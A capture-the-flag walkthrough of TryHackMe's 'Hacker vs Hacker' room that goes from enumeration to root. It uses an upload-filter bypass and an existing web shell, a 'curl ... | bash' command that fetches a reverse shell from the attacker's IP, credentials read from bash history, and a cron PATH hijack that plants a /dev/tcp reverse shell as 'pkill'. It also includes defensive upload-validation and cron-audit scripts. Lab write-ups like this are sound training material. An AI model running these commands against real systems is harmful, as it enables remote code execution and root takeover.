TryHackMe CTF Hacker vs Hacker

Hello guys, back again with another walkthrough. This time we are going to get our hands dirty on the CTF Hacker vs. Hacker from TryHackMe.

Enumeration through NMAP:

nmap -sV -sC -Pn -A 10.10.168.53 -oN nmap

(-oN writes normal output to the file nmap; -A already implies -sV and -sC.)

We have two ports open:

  1. SSH (Secure Shell), which normally requires credentials
  2. HTTP (Hypertext Transfer Protocol), normally a website

Now let's check the website.

Now open the page source of the website and look through the HTML for anything interesting.

Here we find the /cvs directory; let's check it.

Now go back to the home page of this website

Scrolling down we get a CV upload functionality.

File upload functionality is usually set up correctly, but sometimes you get lucky and find a misconfigured one.

Next I tested the upload functionality for security misconfigurations, starting with a plain text file.

I created a simple text file and uploaded it to the website.

After uploading the file I got:

Now check the page source to see what the back end did with it.

Looking at the screenshot above, we notice source-code disclosure: the upload handler uses strpos() to look for the string ".pdf" in the uploaded file name and accepts the file if it is found. That is a substring test, not an extension check, so a name like shell.pdf.php passes while the file keeps its .php extension and is executed by the web server.
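To make the bypass concrete, here is an added example (my own code, not the room's PHP) that models the filter as a POSIX shell function next to a hardened version of the check. The function names, the candidate file names and the content test are my assumptions; weak_check models only the substring test, not PHP's own quirk that strpos() returns a falsy 0 when the match sits at offset 0.

```shell
#!/bin/sh
# Added example: a model of the CV upload filter the page describes, next to a
# hardened replacement. Function and variable names are my own, not the room's.

# weak_check mirrors `!strpos($name, ".pdf")`: the upload is accepted as soon as
# the string ".pdf" occurs ANYWHERE in the file name. "shell.pdf.php" therefore
# passes, and the web server later executes it as PHP.
weak_check() {
    case "$1" in
        *.pdf*) return 0 ;;   # accepted
        *)      return 1 ;;   # rejected
    esac
}

# strict_check validates the name the way an upload handler should:
#  - keep only the basename, so "../../x.pdf" cannot escape the upload directory
#  - require ".pdf" to be the LAST extension
#  - allow only [A-Za-z0-9_-] in the stem, which rules out a second dot and with
#    it names such as "shell.php.pdf" that some Apache handler setups still run as PHP
strict_check() {
    name=${1##*/}
    case "$name" in
        *.pdf) ;;
        *) return 1 ;;
    esac
    stem=${name%.pdf}
    case "$stem" in
        ''|*[!A-Za-z0-9_-]*) return 1 ;;
    esac
    return 0
}

# strict_check_content additionally looks at the bytes: every PDF starts with "%PDF-".
# $1 is the client-supplied name, $2 the path of the temporary uploaded file.
strict_check_content() {
    strict_check "$1" || return 1
    [ "$(head -c 5 "$2" 2>/dev/null)" = "%PDF-" ]
}

# verdict prints one line per candidate name under both checks.
verdict() {
    for n in "$@"; do
        if weak_check "$n"; then w=accept; else w=reject; fi
        if strict_check "$n"; then s=accept; else s=reject; fi
        printf '%-22s weak=%s strict=%s\n' "$n" "$w" "$s"
    done
}

# Constructed candidates: the legitimate name, the bypass used on this box, the
# reversed double extension and a traversal attempt.
verdict cv.pdf shell.pdf.php shell.php.pdf ../../cv.pdf
```

The name check alone is not enough: even a correctly validated upload directory should be served with PHP execution disabled, or the files stored outside the web root, otherwise the next filter bug is again remote code execution.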

Enumeration Through Gobuster:

Now I start directory brute-forcing with gobuster.

Gobuster is a tool for brute-forcing URIs (directories and files) and DNS subdomains.

gobuster dir -u http://10.10.168.53/cvs/ -w /home/zkwan/Git/SecLists/Discovery/Web-Content/common.txt -x .pdf.php -t 50

The -x .pdf.php extension is chosen because that is exactly the kind of name the strpos() check lets through, and the service nmap found is plain HTTP, so the URL uses http://.

From the gobuster result we get /shell.pdf.php, a file that has already been uploaded through the weak filter.

Now open it on the website:

Here we have access to /cvs/shell.pdf.php.

Basic PHP Enumeration

Now I check whether it takes a command through a cmd parameter:

/cvs/shell.pdf.php?cmd=id

The output of id comes back, so the script runs whatever we pass in cmd: it is a web shell that gives us command execution on the box. Now let's get a reverse shell.

Initial Foothold:

Create a reverse shell

The IP address above is my VPN address. Copy the bash reverse-shell one-liner and save it in a file called revshell.sh.

Now start a Python web server on port 8080 in that directory so the target can download the file.

Now start an nc listener in another tab.

Go back to the web shell and pass the following in the cmd parameter of the URL:

cmd=curl http://10.8.78.190:8080/revshell.sh | bash

(The Python web server speaks plain HTTP, so the scheme is http://.)

Check your nc listener; you have a reverse shell.

As you can see in the picture above, I am able to read the user flag.

Privilege Escalation:

I went looking through lachlan's home directory and noticed the .bash_history file.

Reading it, I found a few commands that had been run:

The password of the user lachlan was changed with an echo -e command, so the history hands us the current password for that account.

Looking at /etc/cron.d/persistence, we find jobs that root runs every minute, so if we can get one of them (backup.sh, for instance) to run our code, it runs as root.

Looking at the cron file we notice a classic PATH hijack that gives code execution as root. A cron.d file can set its own PATH, and that PATH decides where a command given by bare name is looked up.

Here the search order is /home/lachlan/bin first, then /bin and lastly /usr/bin.

Since /home/lachlan/bin is in our home directory and writable by us, we can drop a file there with the same name as a command the job calls, and whenever root runs the cron job it executes our file instead of the real binary. Looking at the cron jobs again, most commands use absolute paths, which cannot be hijacked this way, but pkill is called by its bare name.

So we can just log in to the system as lachlan and put a malicious pkill in /home/lachlan/bin, which gives us a root shell the next time the job runs.
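Before planting anything, it is worth having a quick check that finds this pattern in any cron.d file rather than reading it by eye. The following is an added example (my own script, not something from the room): it pulls the PATH the file declares, lists every command a job invokes by bare name, and reports when a directory writable by the current user is searched before the one holding the real binary. Function names and the sample cron file are my own constructions; run it as the low-privileged user, because the writability test reflects whoever runs it.

```shell
#!/bin/sh
# Added example: audit a cron.d file for PATH hijacks of the kind used above.
# Function names are my own; run as the low-privileged user (lachlan), because
# the writability checks reflect the invoking user.

# cron_path prints the PATH a cron file declares (cron uses the last assignment;
# if none is declared, cron falls back to /usr/bin:/bin).
cron_path() {
    sed -n 's/^[[:space:]]*PATH=//p' "$1" | tail -n 1 | tr -d '"'
}

# cron_relative_cmds prints every command name that a job line invokes WITHOUT an
# absolute path (one per line, deduplicated). Job lines are the standard cron.d
# form: five time fields, the user, then the shell command; comments, variable
# assignments and @reboot-style lines are skipped. The command is split on
# ";", "|", "&&" and "||" into simple commands and shell keywords are stepped over.
cron_relative_cmds() {
    awk '
        /^[ \t]*#/ || /^[ \t]*[A-Za-z_][A-Za-z_0-9]*=/ || NF < 7 { next }
        {
            $1 = $2 = $3 = $4 = $5 = $6 = ""
            n = split($0, part, /;|&&|\|\||\|/)
            for (i = 1; i <= n; i++) {
                m = split(part[i], w, /[ \t]+/)
                k = 1
                while (k <= m && (w[k] == "" || w[k] == "do" || w[k] == "then" || w[k] == "else" || w[k] == "{")) k++
                if (k > m) continue
                c = w[k]
                if (c == "for" || c == "done" || c == "fi" || c == "}" || c ~ /^\//) continue
                if (!(c in seen)) { seen[c] = 1; print c }
            }
        }' "$1"
}

# path_hijackable NAME PATHVALUE
# Walks PATHVALUE in order. If a directory we can write to is searched before the
# directory that holds the real NAME (or NAME is not found at all), a file we plant
# there wins: the function prints where and returns 0; otherwise it returns 1.
path_hijackable() {
    name=$1; writable=""
    old_ifs=$IFS; IFS=:
    set -- $2
    IFS=$old_ifs
    for d in "$@"; do
        [ -n "$d" ] || d=.                 # an empty PATH entry means "current directory"
        if [ -z "$writable" ] && [ -d "$d" ] && [ -w "$d" ]; then
            writable=$d
        fi
        if [ -f "$d/$name" ] && [ -x "$d/$name" ]; then
            if [ -n "$writable" ]; then
                printf '%s/%s shadows %s/%s\n' "$writable" "$name" "$d" "$name"
                return 0
            fi
            return 1
        fi
    done
    if [ -n "$writable" ]; then
        printf '%s/%s (no %s anywhere in PATH)\n' "$writable" "$name" "$name"
        return 0
    fi
    return 1
}

# audit_cron FILE: combine the pieces; prints a line per hijackable command and
# returns 0 if any was found.
audit_cron() {
    p=$(cron_path "$1")
    [ -n "$p" ] || p=/usr/bin:/bin
    found=1
    for c in $(cron_relative_cmds "$1"); do
        if hit=$(path_hijackable "$c" "$p"); then
            printf 'HIJACKABLE: %s via %s\n' "$c" "$hit"
            found=0
        fi
    done
    return $found
}

# Usage: sh audit_cron.sh /etc/cron.d/persistence
if [ $# -gt 0 ]; then audit_cron "$1"; fi
```

Run as root it over-reports, since root can write everywhere. A command that exists nowhere in the declared PATH is also reported, because a file planted in the writable directory will simply be the one that runs.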

Now log in with ssh as lachlan using the password from the history.

But the SSH session keeps getting terminated after a few seconds: this is the root cron job (the pkill we just saw) killing lachlan's processes.

Exit this session and start a netcat listener on port 4545 on the attacking machine:

Now log in again via ssh.

After logging in, run the command below as one line before the cron job kicks us out. It writes a bash reverse shell into bin/pkill (that is /home/lachlan/bin/pkill, since we land in the home directory) and makes it executable:

echo "bash -c 'bash -i >& /dev/tcp/10.8.78.190/4545 0>&1'" > bin/pkill ; chmod +x bin/pkill

The file has no shebang line; that is fine here because cron hands its commands to /bin/sh, which runs a plain text file as a shell script.

Check your netcat listener: at the next cron run you get a reverse shell as root. Confirm with id, which should report uid=0(root).

That's all guys, the CTF is done. We have successfully captured two flags, one from user access and the other from root access.

I hope you enjoyed the walkthrough. If so, like it below and follow me so that you won't miss any upcoming walkthroughs.

Zabeehullah Abid

Enterprise Architect, CCSP | TOGAF | CHFI | CEH | DevSecOps

2 years ago

Stay committed.
